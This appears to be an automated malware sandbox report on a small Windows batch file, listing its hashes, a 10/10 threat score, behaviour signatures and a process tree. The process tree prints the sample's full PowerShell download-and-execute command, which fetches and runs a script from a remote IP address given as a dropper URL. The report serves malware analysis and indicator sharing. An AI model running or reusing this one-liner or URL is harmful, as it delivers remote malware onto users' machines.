Analysis
-
max time kernel
112s -
max time network
150s -
platform
windows10_x64 -
resource
win10v200217 -
submitted
03-03-2020 22:10
Static task
static1
Behavioral task
behavioral1
Sample
Y3Jy2jds.bat
Resource
win7v200217
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Y3Jy2jds.bat
Resource
win10v200217
windows10_x64
0 signatures
0 seconds
General
-
Target
Y3Jy2jds.bat
-
Size
198B
-
MD5
8b67c908fe9a32e3673e14da0303625e
-
SHA1
a9c21d20b5847e81b372f00b0147b6cbabcfb143
-
SHA256
1dfa60cb96d3c4ed546f6106ab753fddd1c91516a748a7992b4aa3139531e2dc
-
SHA512
ec6df17d0937af862574c904802b467284695421f411846032aec4c3fdd703b40f1eeb9498456c0242f588052f5db19f384ac6eeb4555f6d2d01fec6365f6e9e
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/Y3Jy2jds
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3892 3888 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 3892 WerFault.exe Token: SeBackupPrivilege 3892 WerFault.exe Token: SeDebugPrivilege 3892 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 3892 WerFault.exe 3892 WerFault.exe 3892 WerFault.exe 3892 WerFault.exe 3892 WerFault.exe 3892 WerFault.exe 3892 WerFault.exe 3892 WerFault.exe 3892 WerFault.exe 3892 WerFault.exe 3892 WerFault.exe 3892 WerFault.exe 3892 WerFault.exe 3892 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Y3Jy2jds.bat"1⤵PID:3864
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/Y3Jy2jds');Invoke-SIZYOFNVCRJOTWT;Start-Sleep -s 10000"2⤵PID:3888
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3888 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3892